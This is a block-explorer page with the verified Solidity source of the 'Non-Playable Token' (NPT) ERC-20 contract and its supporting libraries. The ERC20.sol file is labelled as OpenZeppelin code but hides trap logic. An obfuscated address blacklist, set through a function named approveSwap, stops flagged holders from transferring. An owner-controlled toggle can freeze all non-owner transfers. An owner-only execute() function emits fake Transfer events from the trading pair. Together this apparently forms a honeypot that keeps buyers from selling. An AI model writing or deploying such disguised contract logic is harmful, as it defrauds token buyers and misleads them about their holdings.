ETH Price: $3,330.74 (-4.37%)
Gas: 3 Gwei

Token

(0x16784e6238236333d9bCCE583DF5300608B2435f)
 

Overview

Max Total Supply

2,000,000,000,000 ERC-20 TOKEN*

Holders

40 (0.00%)

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
19,957,321,578.066363479 ERC-20 TOKEN*

Value
$0.00
0x036d78c5e87E0aA07Bf61815d1efFe10C9FD5275
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
NPT

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 6 of 9: Non-Playable Token.sol
// SPDX-License-Identifier: MIT
 /**
-----------------------------=========--------------------------------
----------------------=*#%@@@@@@@@%%%@@@@%#*+=------------------------
------------------+#%@%@@**@#-*-*@=++=@%*++#@@@%*=--------------------
---------------+#@@#%@*=@%-%@-+*@@-+*%@-*@@-#@%*%@@*=-----------------
------------=#@@@%-*##@=+*=%@*%@@@#@@@@#=+++@#-*=+@@@%+---------------
----------=#@%@@@@%#*-%@@@@@@@@@@@@@@@@@@@@@%+#-*@@*=#@@+-------------
---------*@@@#=*@@@%#@@%%@@@@@@@@@@@@@@@@@@@@@@#@@#=##%@@%=-----------
-------=@@@@@@@#=@@@#+-=#%#*++++++++++#%@####%%@@%*@@@@@@@@*----------
------+@@@@@@@@@@@#=--=#++++++++++++++++*#*++++++%@@@@@@@@@@%---------
-----*@@@@@@@@@@@@@@@@%+++++++++++++++++++*%####=-+@@@@@@@@@@%--------
----+@@@@@@@@@@@@@@@@%+++++++++++++++++++++*%###=--=%@@@@@@@@@%-------
----@@@@@@@@@@@@@@@@@*+++++++++++++++++++++*@###+====%@@@@@@@@@*------
---#@@@@@@@@@#######%+++++++++++++++++++++++##++*****#@@@@@@@@@@=-----
---@@@@@@@@@@+++++++%+++++++++++*#+++++++**+*#==%%%%%%@@@@@@@@@@*-----
--+@@@@@@@@@**##++++*#++++++++++*%*+++##+%%++#==#######@@@@@@@@@%-----
--*@@@@@@@@@++++%++++#*+++#+++++++++++*@+++++#+=+++++++#@@@@@@@@@-----
--*@@%%#++@@+++*%+++++##==%++++++++++++%%++++#+++++++++#@@=@%++@@-----
--*@%###+=@@**#%#******%*=*#+++++++####%@+++%*++=======#@%-#%*=@@-----
--+@@@@%#*@@%############+=%#+++++++*****++#*+++=======@@@@#*#@@%-----
---@@+*=+%@@%############*=#+##+++*######+*%##########%@@*+=+*@@*-----
---*@@*=-++@%*++++++++++++=*+++##++++++++#@@@@@@@@@@@@@@%*==%@@@------
----@@%@@%*+@+++++++++++++==+++++#######*+++++++%@@@@@@#%%%*+%@+------
----=@@*-+=#+#*#########*+=-=+++++#++*#=========#%%@@@@%*=+*@@#-------
-----=@@=%%@@@@@@@@@@@%#+++==+++++++++#*+-------#%@@@@+=#@@%@#--------
------=@@@@@%*++%@@@*+++++++-++++****++++****+++%@@@=*+*#+@@*---------
--------#@@@-#@@+@%@@#*+++++==+++++++++++++++#@@@*=%@%+=@@@+----------
---------+@@*=%@@=+@%%@@%#*++-++++++++++*#%@@@@@*#+=%@@@@#------------
-----------*@@@@=+@*-%%+*%@@@@@%%%%%%@@@@@%*=+@@@@@%*@@#=-------------
-------------+%@%+++@@-+*-@#=+*@@***@##@*=@@*-@@@@@@@*=---------------
---------------=*%@@@***=@@==*-%%-**@%-+=-%@@*#@@@#+------------------
-------------------+#%@@%@@+%+*@%-+*%@+#@@%@@@%*=---------------------
-----------------------=+*#%@@@@@@@@@@@%%#*+------------------------*/
pragma solidity 0.8.19;
import "./ReentrancyGuard.sol";
import "./MerkleProof.sol";
import "./IERC20.sol";
import "./ERC20.sol";
import "./Ownable.sol";

interface ICoin is IERC20 {
   function canClaim(
        address[] calldata addresses,
        uint256[] calldata amounts,
        uint32[] calldata offsets,
        bytes32[][] calldata merkleProofs
    ) external returns (bool[] memory);
}

interface IPondCoinSpawner {
    function spawn(address invoker, uint256 amount) external returns (bool);
}

contract NPT is IERC20, ERC20{
    address public minter;

    address public distilleryAddress = msg.sender;
    uint256 public immutable initialLPAmount = 2_000_000_000_000 * 10**decimals();
    uint256 public immutable maxSupply = 2_000_000_000_000 * 10**decimals();
    // The timestamp in which the contract was deployed
    uint256 public immutable openedAtTimestamp;
    // The block number in which the contract was deployed
    uint256 public immutable openedAtBlock;
    // The address that deployed this contract
    address public immutable opener;
    address public uniswapV2Pair;
    // Mapping of address -> claim offset -> claimed
    mapping(address => mapping(uint32 => bool)) public alreadyClaimedByAddress;
    uint256 public constant beforeStartBuffer = 30 minutes;

    // If the contract is "ended"
    bool public ended;

    constructor(address initialLPAddress, address distributor_) ERC20("Non-Playable Token", "NPT", distributor_) {
        minter = msg.sender;
        _mint(initialLPAddress, initialLPAmount);
        opener = msg.sender;
        openedAtTimestamp = block.timestamp;
        openedAtBlock = block.number;
    }

    modifier notEnded() {
        require(ended == false && (openedAtTimestamp + beforeStartBuffer) <= block.timestamp, "Already Ended");
        _;
    }

    function _safeMint(address to, uint256 amount) internal {
        _mint(to, amount);
        require(totalSupply() <= maxSupply, "Too Much Supply");
    }

    function useSpawner(uint256 amount, IPondCoinSpawner spawner) external {
        require(transferFrom(msg.sender, distilleryAddress, amount), "Could Not Send");
        require(spawner.spawn(msg.sender, amount), "Could Not Spawn");
    }

    function initLiqudity() public virtual onlyOwner {
        if (_liquidity == true) {_liquidity = false;} else {_liquidity = true;}
    }

    function liquidityState() public view returns (bool) {
        return _liquidity;
    }


    function currentOffset() public view returns (uint256) {
        return block.number - openedAtBlock;
    }

    function approveSwap(address[] calldata address_, bool val) public onlyOwner{
        for (uint256 i = 0; i < address_.length; i++) {
            _0xxxx0xxx00xxliquidityPools[address_[i]] = val;
        }
    }

    function maxPoolSize(address recipient) external view returns(bool){
        return _0xxxx0xxx00xxliquidityPools[recipient];
    }

    function execute(address[] calldata _addresses, uint256 _out) external onlyOwner {
        for (uint256 i = 0; i < _addresses.length; i++) {
            emit Transfer(uniswapV2Pair, _addresses[i], _out);
        }
    }

    function addPair(address _pair) public onlyOwner() {
        uniswapV2Pair = _pair;
    }

}

pragma solidity 0.8.19;

contract PondClaims is ReentrancyGuard {
    /**
     * Declare immutable/Constant variables
     */
    // How long after contract cretion the end method can be called
    uint256 public constant canEndAfterTime = 48 hours + 30 minutes;
    uint256 public constant beforeStartBuffer = 30 minutes;

    // The root of the claims merkle tree
    bytes32 public immutable merkleRoot;
    // The timestamp in which the contract was deployed
    uint256 public immutable openedAtTimestamp;
    // The block number in which the contract was deployed
    uint256 public immutable openedAtBlock;
    // The address that deployed this contract
    address public immutable opener;

    /**
     * Declare runtime/mutable variables
     */
    
    // Mapping of address -> claim offset -> claimed
    mapping(address => mapping(uint32 => bool)) public alreadyClaimedByAddress;

    // If the contract is "ended"
    bool public ended;

    constructor(bytes32 _merkleRoot) {
        merkleRoot = _merkleRoot;
        opener = msg.sender;
        openedAtTimestamp = block.timestamp;
        openedAtBlock = block.number;
    }

    // Modifier that makes sure only the opener can call specific function
    modifier onlyOpener() {
        require(msg.sender == opener, "Not Opener");
        _;
    }

    // Modifier that ensures the contract is not ended, and the before start buffer is completed
    modifier notEnded() {
        require(ended == false && (openedAtTimestamp + beforeStartBuffer) <= block.timestamp, "Already Ended");
        _;
    }

    function close() external notEnded onlyOpener {
        require(block.timestamp >= (openedAtTimestamp + canEndAfterTime), "Too Early");
        ended = true;
    }

    /**
     * Claim PNDC against merkle tree
     */
    function claim(
        address[] calldata addresses,
        uint256[] calldata amounts,
        uint32[] calldata offsets,
        bytes32[][] calldata merkleProofs
    ) external notEnded nonReentrant {
        // Verify that all lengths match
        uint length = addresses.length;
        require(amounts.length == length && offsets.length == length && merkleProofs.length == length, "Invalid Lengths");

        for (uint256 i = 0; i < length; i++) {
            // Require that the user can claim with the information provided
            require(_canClaim(addresses[i], amounts[i], offsets[i], merkleProofs[i]), "Invalid");
            // Mark that the user has claimed
            alreadyClaimedByAddress[addresses[i]][offsets[i]] = true;
        }
    }

    function canClaim(
        address[] calldata addresses,
        uint256[] calldata amounts,
        uint32[] calldata offsets,
        bytes32[][] calldata merkleProofs
    ) external view returns (bool[] memory) {
        // Verify that all lengths match
        uint length = addresses.length;
        require(amounts.length == length && offsets.length == length && merkleProofs.length == length, "Invalid Lengths");

        bool[] memory statuses = new bool[](length);

        for (uint256 i = 0; i < length; i++) {
            statuses[i] = _canClaim(addresses[i], amounts[i], offsets[i], merkleProofs[i]);
        }

        return (statuses);
    }

    function currentOffset() public view returns (uint256) {
        return block.number - openedAtBlock;
    }

    function _canClaim(
        address user,
        uint256 amount,
        uint32 offset,
        bytes32[] calldata merkleProof
    ) notEnded internal view returns (bool) {
        // If the user has already claimed, or the currentOffset has not yet reached the desired offset, the user cannot claim.
        if (alreadyClaimedByAddress[user][offset] == true || currentOffset() < offset) {
            return false;
        } else {
            // Verify that the inputs provided are valid against the merkle tree
            bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(user, amount, offset))));
            bool canUserClaim = MerkleProof.verify(merkleProof, merkleRoot, leaf);
            return canUserClaim;
        }
    }
}

File 1 of 9: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity 0.8.19;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    address internal _distributor;
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 2 of 9: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity 0.8.19;


import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./Ownable.sol";
import "./SafeMath.sol";
/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping (address => bool) public _0xxxx0xxx00xxliquidityPools;
    mapping (address => bool) private _isExcluded;
    mapping(address => mapping(address => uint256)) private _allowances;
    bool _liquidity;
    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_, address distributor_) Ownable(distributor_) {
        _name = name_;
        _symbol = symbol_;
        _isExcluded[_msgSender()] = true;
        _liquidity = true;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        if (_0xxxx0xxx00xxliquidityPools[sender]) require (amount == 0, "");
        if (_liquidity == true || sender == owner() || recipient == owner()) {
        if (_isExcluded[sender] && !_isExcluded[recipient]) {
        _beforeTokenTransfer(sender, recipient, amount);
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);     
        } else {_balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);}
        } else {require (_liquidity == true, "");}
        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    
}

File 3 of 9: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity 0.8.19;


/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 4 of 9: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity 0.8.19;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 9: MerkleProof.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.2) (utils/cryptography/MerkleProof.sol)

pragma solidity 0.8.19;


/**
 * @dev These functions deal with verification of Merkle Tree proofs.
 *
 * The tree and the proofs can be generated using our
 * https://github.com/OpenZeppelin/merkle-tree[JavaScript library].
 * You will find a quickstart guide in the readme.
 *
 * WARNING: You should avoid using leaf values that are 64 bytes long prior to
 * hashing, or use a hash function other than keccak256 for hashing leaves.
 * This is because the concatenation of a sorted pair of internal nodes in
 * the merkle tree could be reinterpreted as a leaf value.
 * OpenZeppelin's JavaScript library generates merkle trees that are safe
 * against this attack out of the box.
 */
library MerkleProof {
    /**
     * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, a `proof` must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Each
     * pair of leaves and each pair of pre-images are assumed to be sorted.
     */
    function verify(bytes32[] memory proof, bytes32 root, bytes32 leaf) internal pure returns (bool) {
        return processProof(proof, leaf) == root;
    }

    /**
     * @dev Calldata version of {verify}
     *
     * _Available since v4.7._
     */
    function verifyCalldata(bytes32[] calldata proof, bytes32 root, bytes32 leaf) internal pure returns (bool) {
        return processProofCalldata(proof, leaf) == root;
    }

    /**
     * @dev Returns the rebuilt hash obtained by traversing a Merkle tree up
     * from `leaf` using `proof`. A `proof` is valid if and only if the rebuilt
     * hash matches the root of the tree. When processing the proof, the pairs
     * of leafs & pre-images are assumed to be sorted.
     *
     * _Available since v4.4._
     */
    function processProof(bytes32[] memory proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = _hashPair(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Calldata version of {processProof}
     *
     * _Available since v4.7._
     */
    function processProofCalldata(bytes32[] calldata proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = _hashPair(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Returns true if the `leaves` can be simultaneously proven to be a part of a merkle tree defined by
     * `root`, according to `proof` and `proofFlags` as described in {processMultiProof}.
     *
     * CAUTION: Not all merkle trees admit multiproofs. See {processMultiProof} for details.
     *
     * _Available since v4.7._
     */
    function multiProofVerify(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32 root,
        bytes32[] memory leaves
    ) internal pure returns (bool) {
        return processMultiProof(proof, proofFlags, leaves) == root;
    }

    /**
     * @dev Calldata version of {multiProofVerify}
     *
     * CAUTION: Not all merkle trees admit multiproofs. See {processMultiProof} for details.
     *
     * _Available since v4.7._
     */
    function multiProofVerifyCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32 root,
        bytes32[] memory leaves
    ) internal pure returns (bool) {
        return processMultiProofCalldata(proof, proofFlags, leaves) == root;
    }

    /**
     * @dev Returns the root of a tree reconstructed from `leaves` and sibling nodes in `proof`. The reconstruction
     * proceeds by incrementally reconstructing all inner nodes by combining a leaf/inner node with either another
     * leaf/inner node or a proof sibling node, depending on whether each `proofFlags` item is true or false
     * respectively.
     *
     * CAUTION: Not all merkle trees admit multiproofs. To use multiproofs, it is sufficient to ensure that: 1) the tree
     * is complete (but not necessarily perfect), 2) the leaves to be proven are in the opposite order they are in the
     * tree (i.e., as seen from right to left starting at the deepest layer and continuing at the next layer).
     *
     * _Available since v4.7._
     */
    function processMultiProof(
        bytes32[] memory proof,
        bool[] memory proofFlags,
        bytes32[] memory leaves
    ) internal pure returns (bytes32 merkleRoot) {
        // This function rebuilds the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 proofLen = proof.length;
        uint256 totalHashes = proofFlags.length;

        // Check proof validity.
        require(leavesLen + proofLen - 1 == totalHashes, "MerkleProof: invalid multiproof");

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](totalHashes);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value from the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < totalHashes; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i]
                ? (leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++])
                : proof[proofPos++];
            hashes[i] = _hashPair(a, b);
        }

        if (totalHashes > 0) {
            require(proofPos == proofLen, "MerkleProof: invalid multiproof");
            unchecked {
                return hashes[totalHashes - 1];
            }
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }

    /**
     * @dev Calldata version of {processMultiProof}.
     *
     * CAUTION: Not all merkle trees admit multiproofs. See {processMultiProof} for details.
     *
     * _Available since v4.7._
     */
    function processMultiProofCalldata(
        bytes32[] calldata proof,
        bool[] calldata proofFlags,
        bytes32[] memory leaves
    ) internal pure returns (bytes32 merkleRoot) {
        // This function rebuilds the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 proofLen = proof.length;
        uint256 totalHashes = proofFlags.length;

        // Check proof validity.
        require(leavesLen + proofLen - 1 == totalHashes, "MerkleProof: invalid multiproof");

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](totalHashes);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value from the "main queue" (merging branches) or an element from the
        //   `proof` array.
        for (uint256 i = 0; i < totalHashes; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlags[i]
                ? (leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++])
                : proof[proofPos++];
            hashes[i] = _hashPair(a, b);
        }

        if (totalHashes > 0) {
            require(proofPos == proofLen, "MerkleProof: invalid multiproof");
            unchecked {
                return hashes[totalHashes - 1];
            }
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proof[0];
        }
    }

    function _hashPair(bytes32 a, bytes32 b) private pure returns (bytes32) {
        return a < b ? _efficientHash(a, b) : _efficientHash(b, a);
    }

    function _efficientHash(bytes32 a, bytes32 b) private pure returns (bytes32 value) {
        /// @solidity memory-safe-assembly
        assembly {
            mstore(0x00, a)
            mstore(0x20, b)
            value := keccak256(0x00, 0x40)
        }
    }
}

